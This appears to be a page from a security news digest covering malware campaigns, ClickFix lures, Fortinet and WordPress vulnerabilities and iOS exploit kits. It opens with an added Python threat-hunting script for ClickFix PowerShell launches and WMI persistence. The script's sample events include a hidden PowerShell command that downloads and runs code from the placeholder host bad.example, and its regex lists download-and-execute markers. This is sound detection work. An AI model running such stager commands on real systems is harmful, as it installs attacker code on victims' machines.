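Two of the behaviours above leave distinctive endpoint telemetry: the ClickFix launch (PowerShell spawned by explorer.exe from the Run dialog with a download-and-execute command line) and WMI event-subscription persistence. The hunt below is an added example, not a vendor's or CyberHappenings' detection logic. Events are constructed in a Sysmon-like shape (event 1 = process creation, 20 = WMI consumer, 21 = filter-to-consumer binding); the field names and the keyword list are assumptions to adapt to your own telemetry, and `bad.example` is a placeholder.

```python
"""Hunt for ClickFix launches and WMI persistence in process/WMI events.
Added example; event records are constructed."""
import re

# Strings that mark a 'paste this into Run' payload. Tune per environment.
CLICKFIX_MARKERS = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|"
    r"downloadstring|invoke-webrequest|\biwr\b|\bmshta\b|\bcurl\b)",
    re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SHELL_PARENTS = {"explorer.exe"}  # Run dialog and File Explorer launch via explorer


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Reasons an event is suspicious (empty list if none)."""
    reasons = []
    if ev["EventID"] == 1:
        img, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        if (img in POWERSHELL and parent in SHELL_PARENTS
                and CLICKFIX_MARKERS.search(ev["CommandLine"])):
            reasons.append("clickfix: powershell from explorer with download/exec markers")
    elif ev["EventID"] == 20:
        # CommandLineEventConsumer whose command looks like the stager.
        if ("command" in ev.get("Type", "").lower()
                and CLICKFIX_MARKERS.search(ev.get("Destination", ""))):
            reasons.append("wmi persistence: CommandLineEventConsumer running PowerShell")
    elif ev["EventID"] == 21:
        reasons.append("wmi persistence: filter-to-consumer binding created")
    return reasons


def hunt(events):
    """[(event id, host, reason)] over all events."""
    return [(ev["EventID"], ev.get("Host"), r) for ev in events for r in score_event(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events: one ClickFix launch, one benign PowerShell from explorer,
# one encoded command from a management agent (different rule), and the two
# WMI subscription events that re-arm the infection.
SAMPLE_EVENTS = [
    {"EventID": 1, "Host": "ws-17", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('http://bad.example/x')\""},
    {"EventID": 1, "Host": "ws-17", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-ChildItem"},
    {"EventID": 1, "Host": "ws-18", "Image": PS,
     "ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "CommandLine": "powershell -enc AAAA"},
    {"EventID": 20, "Host": "ws-17", "Name": "Updater", "Type": "Command Line",
     "Destination": "powershell.exe -w hidden -enc SQBFAFgA"},
    {"EventID": 21, "Host": "ws-17", "Consumer": 'CommandLineEventConsumer.Name="Updater"',
     "Filter": '__EventFilter.Name="Updater"'},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The three-day re-infection described above is the reason event 21 is flagged unconditionally: a binding is what turns a stored filter and consumer into scheduled execution, and on most workstations there is no legitimate reason for one to appear. Where cleanup already happened, enumerating `root\subscription` for surviving bindings is the check that tells you whether it will come back.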

RoadK1ll WebSocket implant observed pivoting within breached networks via outbound-only tunneling

Updated: · First: 30.03.2026 23:49 · 📰 1 src / 1 articles

A recently identified Node.js-based malware implant named RoadK1ll is being used by threat actors to establish covert tunnels via WebSocket for lateral movement within compromised networks. The implant operates as a lightweight reverse tunneling tool that converts a single infected host into a relay node, enabling attackers to bypass perimeter controls and access internal systems not directly exposed. It establishes an outbound WebSocket connection to attacker-controlled infrastructure to relay TCP traffic on demand, avoiding the need for inbound listeners that could trigger detection. The tool supports concurrent connections, command execution, and automatic reconnection, facilitating persistent, low-noise access without traditional persistence mechanisms. Researchers link observed use of RoadK1ll to recent incident response engagements, highlighting its role in extending attacker dwell time and enabling pivoting to sensitive network segments.

Tax-season phishing campaigns escalate with RMM tools and multi-vector social engineering

Updated: · First: 30.03.2026 18:00 · 📰 1 src / 1 articles

Cybercriminals have launched over a hundred tax-themed phishing campaigns in early 2026, employing malware, remote access tools, fraud schemes, and credential harvesting. Threat actors are increasingly integrating remote monitoring and management (RMM) tools into their operations to maintain persistence and escalate intrusions. These campaigns leverage seasonally relevant lures tied to tax filing pressures, including fake investment firm requests for updated W-8BEN forms and business email compromise (BEC) attempts targeting employees for W-2/W-9 forms. The tactics exploit urgency around penalties, missing documents, and compliance, resulting in credential theft and exposure of sensitive financial and personal data.

Shamos Infostealer Targeting Mac Devices via ClickFix Attacks

Updated: 30.03.2026 17:32 · First: 22.08.2025 18:44 · 📰 6 src / 10 articles

In March 2026, Apple introduced a Terminal security feature in macOS Tahoe 26.4 that blocks execution of pasted commands and warns users of potential risks, directly targeting ClickFix-style social engineering attacks used to distribute malware such as Shamos and MacSync. Since June 2025, the COOKIE SPIDER group’s Shamos infostealer has targeted Mac devices via ClickFix attacks, stealing data and credentials from browsers, Keychain, Apple Notes, and cryptocurrency wallets. Early variants relied on malvertising and fake GitHub repositories to trick users into executing shell commands, while later MacSync variants used digitally signed, notarized Swift applications to bypass Gatekeeper checks. Recent campaigns have leveraged legitimate platforms like Cloudflare Pages and Squarespace to host malicious installers, with ClickFix evolving to require minimal user pretexts.

Gartner’s structured evaluation framework for AI SOC agent deployments released amid rising adoption

Updated: · First: 30.03.2026 17:01 · 📰 1 src / 1 articles

Gartner has published a structured evaluation framework for AI-driven Security Operations Center (SOC) agents, highlighting significant gaps between adoption rates and measurable improvements. The framework aims to help cybersecurity leaders assess vendor claims, integration complexity, autonomy boundaries, and long-term vendor viability before deployment. The report warns that while 70% of large SOCs are expected to pilot AI agents by 2028, only 15% will achieve measurable improvements without structured evaluation. Gartner’s framework emphasizes outcomes-driven metrics, analyst augmentation, transparency, and integration depth as critical evaluation criteria.

Transient data exposure flaw in Lloyds mobile banking update

Updated: · First: 30.03.2026 17:00 · 📰 1 src / 1 articles

A transient software defect in a system update for Lloyds Banking Group’s mobile banking platform enabled temporary exposure of customer personal and transactional data to other users. The incident occurred during an overnight update on 12 March and affected customers of Lloyds, Halifax and Bank of Scotland, where brief overlapping app sessions allowed some users to view unrelated transactions, account details, payment references, and national insurance numbers. No evidence of subsequent financial fraud or data misuse has been reported, but 3,625 customers received compensation totalling £139,000.

Windows 11 preview update KB5079391 installation failures prompt rollback

Updated: · First: 30.03.2026 12:38 · 📰 1 src / 1 articles

Microsoft has paused the rollout of Windows 11 non-security preview update KB5079391 (OS build 26100.2484) due to widespread installation failures marked by error code 0x80073712, affecting systems running Windows 11 24H2 and 25H2. The update included 29 changes such as Smart App Control improvements, Display enhancements, Windows Hello Fingerprint reliability fixes, and Windows Recovery Environment (Windows RE) stability updates for x64 apps on ARM64 devices. Installation errors manifest with the message: "Some update files are missing or have problems. We'll try to download the update again later. Error code: (0x80073712)."

UK Alarm Provider Fined £100,000 for Unlawful Nuisance Calls to TPS Registrants

Updated: · First: 30.03.2026 12:30 · 📰 1 src / 1 articles

A UK-based monitored alarm provider, TMAC, was fined £100,000 by the Information Commissioner’s Office (ICO) for making 260,000 nuisance calls to numbers registered on the Telephone Preference Service (TPS). The calls, made between February and September 2024, deliberately targeted individuals over 60 using predatory tactics, including impersonating local crime and fire prevention initiatives to deceive recipients. Callers concealed their true identities and failed to comply with UK telemarketing regulations under PECR.

European Commission Investigates Breach in Mobile Device Management Platform

Updated: 30.03.2026 11:15 · First: 09.02.2026 11:49 · 📰 3 src / 3 articles

The European Commission has confirmed a second breach affecting its Amazon cloud infrastructure, which hosted its Europa.eu platform, occurring on March 24, 2026. A threat actor, identified as ShinyHunters, claims to have stolen over 350GB of data, including databases, confidential documents, employee PII, DKIM keys, internal admin URLs, NextCloud data, and military financing data. The attacker stated no intention to extort the Commission but warned of potential secondary impacts such as identity risk and spear-phishing attacks. The breach was contained within hours, and the Commission is notifying affected entities while investigating the full impact. This follows the January 30, 2026 breach of the Commission’s mobile device management platform, linked to Ivanti EPMM vulnerabilities, which exposed staff names, phone numbers, and business email addresses and was contained within 9 hours.

Critical Fortinet Vulnerabilities: FortiCloud SSO Bypass and FortiClientEMS SQLi Patched

Updated: 30.03.2026 10:48 · First: 09.12.2025 20:36 · 📰 15 src / 45 articles

Fortinet’s **critical SQL injection vulnerability (CVE-2026-21643, CVSS 9.1)** in FortiClientEMS is now being actively exploited in attacks, according to threat intelligence reports. The flaw allows unauthenticated attackers to execute arbitrary code via crafted HTTP requests targeting the 'Site' header in the web interface. Nearly **1,000 exposed FortiClient EMS instances** remain vulnerable online, with the majority located in the U.S. and Europe. This follows Fortinet’s recent emergency patches for **CVE-2026-24858**, a critical FortiCloud SSO authentication bypass (CVSS 9.4) that was exploited to create admin accounts, modify firewall configurations, and exfiltrate data from over 25,000 exposed devices. CISA has mandated patches for federal agencies, but CVE-2026-21643 remains unlisted in its KEV catalog despite confirmed exploitation. The vulnerabilities stem from improper input validation—SQL injection in FortiClientEMS and authentication bypass in FortiCloud SSO—and have been linked to automated attacks since January 2026. Fortinet advises disabling FortiCloud SSO until patches are applied, restricting management interface access, and treating compromised systems as fully breached, requiring credential rotation and configuration restoration from clean backups. Patches for CVE-2026-24858 are available in **FortiOS 7.4.11**, **FortiManager 7.4.10**, and **FortiAnalyzer 7.4.10**, while CVE-2026-21643 is fixed in **FortiClientEMS 7.4.5** (versions 7.2 and 8.0 are unaffected).

China-aligned clusters conduct coordinated Southeast Asian government intrusion campaign with multi-stage malware toolkits

Updated: · First: 30.03.2026 10:00 · 📰 1 src / 1 articles

A coordinated cyber operation attributed to three China-linked clusters targeted a Southeast Asian government organization between March and September 2025. The campaign deployed a suite of malware families including HIUPAN (USBFect), PUBLOAD, EggStremeFuel/Loader, MASOL RAT, PoshRAT, TrackBak Stealer, Hypnosis Loader, and FluffyGh0st via complex infection chains. The activity indicates persistent access was the primary objective, leveraging overlapping TTPs across Mustang Panda (June–August), CL-STA-1048 (March–September, overlapping Earth Estries/Crimson Palace), and CL-STA-1049 (April & August, overlapping Unfading Sea Haze).

Arbitrary file read vulnerability in Smart Slider 3 plugin exposes WordPress sites to credential theft

Updated: · First: 29.03.2026 17:38 · 📰 1 src / 1 articles

A missing capability check in the Smart Slider 3 WordPress plugin allows authenticated users, including subscribers, to read arbitrary files on the server. This flaw affects over 800,000 active installations and enables access to sensitive files such as wp-config.php, exposing database credentials, cryptographic keys, and salts. The vulnerability, tracked as CVE-2026-3098, was patched in version 3.5.1.34 on March 24, 2026, but approximately 500,000 sites remain unpatched and at risk of user data theft or full site compromise.

Iranian Hacktivist Group Claims Wiper Attack on Stryker

Updated: 28.03.2026 17:40 · First: 11.03.2026 18:20 · 📰 8 src / 8 articles

The Iranian hacktivist group Handala—linked to Iran’s Ministry of Intelligence and Security (MOIS)—conducted a destructive wiper attack against Stryker, a U.S. Fortune 500 medical technology company, on March 11, 2026. The attack affected over 200,000 systems across 79 countries, disrupted operations in Ireland, and sent over 5,000 workers home. Handala claimed responsibility, citing retaliation for a U.S. missile strike. The attack leveraged Microsoft Intune to issue remote wipe commands and defaced Stryker’s Entra login page. Stryker confirmed the incident in an SEC filing and reported no evidence of data exfiltration. Recovery efforts prioritized restoring supply-chain systems. In a separate but related development, Handala breached the personal email account of FBI Director Kash Patel on March 28, 2026, and leaked historical emails from 2010 and 2019. The FBI acknowledged the targeting and stated the leaked data was not government-related. Handala operates under multiple monikers, including Banished Kitten and Void Manticore, and has integrated criminal tools such as Rhadamanthys stealer to enhance its operations. The group’s activities align with broader Iranian cyber operations targeting Western entities amid heightened geopolitical tensions, including destructive attacks, hack-and-leak campaigns, and psychological influence operations. U.S. authorities have seized multiple domains linked to Handala and offered a $10 million reward for information on group members.

Infinity Stealer macOS infostealer delivered via ClickFix CAPTCHA lures

Updated: · First: 28.03.2026 16:35 · 📰 1 src / 1 articles

A new macOS-targeting infostealer named Infinity Stealer is being distributed via ClickFix CAPTCHA lures impersonating Cloudflare’s human verification, leading victims to execute a base64-obfuscated Bash command that fetches and runs a Nuitka-compiled Python payload. The attack abuses a fake CAPTCHA on update-check[.]com to bypass OS defenses and install a Mach-O loader that extracts a zstd-compressed archive containing the stealer. Infinity Stealer harvests browser credentials, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets from developer files, and exfiltrates data via HTTP POST to C2 with Telegram notifications to operators.

Russian UNC6353 Uses Coruna and Darksword iOS Exploit Kits Across iOS 13–18.7 Targeting Financial Espionage and Data Theft

Updated: 27.03.2026 19:22 · First: 04.03.2026 15:28 · 📰 13 src / 15 articles

Apple has begun sending Lock Screen notifications to iPhones and iPads running outdated iOS versions warning users of active web-based exploits and urging immediate updates. This follows Apple’s support document alerting users to exploit kits like Coruna (targeting iOS 13–18.7) and Darksword (targeting iOS 18.4–18.7) and the public leak of a newer Darksword version on GitHub. Coruna and Darksword are now independently confirmed as closely related frameworks with shared origins in the 2019–2023 Operation Triangulation campaign, reinforcing attribution to Russian threat actor UNC6353 and associated groups. Coruna has evolved from a precision espionage tool into a mass-exploitation framework with 23 exploits across five chains, while Darksword is now publicly leaked and targets iOS 18.7. Apple has patched all exploited flaws in recent releases (18.7.3, 26.2, 26.3.1), and CISA has mandated federal agencies patch three DarkSword-linked vulnerabilities (CVE-2025-31277, CVE-2025-43510, CVE-2025-43520) by April 3, 2026. Campaigns linked to UNC6353, UNC6748, and Turkish vendor PARS Defense highlight the growing commoditization of iOS exploitation tools and elevated risk to end-users globally.